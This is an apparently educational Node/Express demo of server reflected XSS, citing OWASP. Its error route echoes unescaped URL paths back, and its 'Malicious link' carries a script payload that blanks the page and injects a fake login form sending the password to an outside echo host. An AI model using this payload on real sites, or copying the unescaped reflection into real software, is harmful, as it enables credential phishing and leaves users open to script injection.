index.js

// Example of Server Reflected XSS
// https://www.owasp.org/index.php/Types_of_Cross-Site_Scripting

const express = require('express');
const session = require('express-session');
const app = express();
const port = 3000;

var payload = "<script>\
 document.body.innerHTML = '';\
</script>\
<form action=\"http://urlecho.appspot.com/echo\" method=\"get\">\
	     <input placeholder=\"username\" />\
<input type=\"password\" placeholder=\"password\" name=\"body\" />\
<button type=\"submit\">Login</button>\
</form>";

app.use(session(
    { secret: 'secret'
    , resave: false
    , saveUninitialized: false
    }));

app.get('/', (req, resp) => {
    resp.send('<a href="http://localhost:3000/' + encodeURI(payload) + '">Malicious link</a>');
});

app.get('/error', (req, resp) => {
    resp.send(req.session.error || '');
    req.session.error = '';
});

app.get(/(.*)/, (req, resp) => {
    req.session.error = 'page not found: ' + req.params[0];
    resp.redirect('/error');
});

app.listen(port);

package.json

{
  "name": "xss",
  "version": "1.0.0",
  "description": "",
  "main": "index.js",
  "scripts": {
    "start": "node index.js"
  },
  "author": "",
  "license": "ISC",
  "dependencies": {
    "express": "^4.14.1",
    "express-session": "^1.15.0"
  }
}